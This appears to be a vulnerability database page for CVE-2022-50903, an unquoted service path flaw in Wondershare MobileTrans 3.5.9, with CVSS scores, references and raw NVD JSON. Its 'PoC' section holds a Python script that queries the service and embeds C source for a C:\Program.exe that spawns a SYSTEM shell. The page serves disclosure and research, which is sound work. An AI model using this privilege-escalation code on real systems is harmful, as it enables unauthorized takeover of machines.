CVE-2022-50903

Description

Wondershare MobileTrans 3.5.9 contains an unquoted service path vulnerability in the ElevationService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path by placing malicious executables in specific filesystem locations that will be executed with LocalSystem permissions during service startup.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wondershare:mobiletrans:3.5.9:*:*:*:*:*:*:* - VULNERABLE

Wondershare MobileTrans 3.5.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2022-50903 PoC - Unquoted Service Path Exploitation
# This PoC demonstrates the unquoted service path vulnerability in Wondershare MobileTrans ElevationService
# Author: Security Researcher
# Target: Wondershare MobileTrans 3.5.9

import os
import sys
import subprocess
import shutil

def check_vulnerability():
    """Check if the vulnerable service exists"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'ElevationService'],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print("[+] ElevationService found")
            print("[*] Extracting service path...")
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    print(f"[*] {line.strip()}")
                    return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_malicious_executable():
    """Generate malicious executable for privilege escalation"""
    malicious_path = r'C:\Program.exe'
    
    # Create a simple malicious executable (reverse shell or command execution)
    malicious_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    // Log successful exploitation
    FILE *log = fopen("C:\\\\Windows\\\\Temp\\\\exploit_log.txt", "a");
    if (log) {
        fprintf(log, "[+] Exploitation successful at %s\n", __TIME__);
        fclose(log);
    }
    
    // Execute commands with SYSTEM privileges
    system("cmd.exe /c whoami > C:\\\\Windows\\\\Temp\\\\priv_esc.txt");
    
    // Spawn a SYSTEM shell
    system("cmd.exe");
    
    return 0;
}
'''
    
    # In real attack, compile and place the malicious executable
    print(f"[!] In production, compile malicious code and place at: {malicious_path}")
    print("[!] When ElevationService starts, it will execute C:\\Program.exe instead of full path")
    return True

def main():
    print("=" * 60)
    print("CVE-2022-50903 - Wondershare MobileTrans Unquoted Service Path")
    print("=" * 60)
    
    if not check_vulnerability():
        print("[-] Target service not found or not vulnerable")
        return
    
    print("[*] Creating exploitation payload...")
    create_malicious_executable()
    
    print("\n[!] Attack simulation complete")
    print("[*] To exploit: Place malicious executable at unquoted path location")
    print("[*] Service restart will trigger execution with SYSTEM privileges")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50903
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50903
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50903/
[4] VulDB https://vuldb.com/cve/CVE-2022-50903
[5] https://www.exploit-db.com/exploits/50756
[6] https://www.vulncheck.com/advisories/wondershare-mobiletrans-elevationservice-unquoted-service-path
[7] https://www.wondershare.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50903", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:52.727", "lastModified": "2026-01-28T19:53:30.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wondershare MobileTrans 3.5.9 contains an unquoted service path vulnerability in the ElevationService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path by placing malicious executables in specific filesystem locations that will be executed with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Wondershare MobileTrans 3.5.9 contiene una vulnerabilidad de ruta de servicio sin comillas en el ElevationService que permite a usuarios locales ejecutar potencialmente código con privilegios de sistema elevados. Los atacantes pueden explotar la ruta sin comillas colocando ejecutables maliciosos en ubicaciones específicas del sistema de archivos que se ejecutarán con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wondershare:mobiletrans:3.5.9:*:*:*:*:*:*:*", "matchCriteriaId": "E85DD9F5-ADF8-413F-AED2-D59399EAF3E1"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50756", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/wondershare-mobiletrans-elevationservice-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wondershare.com/", "source": "[email protected]", "tags": ["Product"]}]}}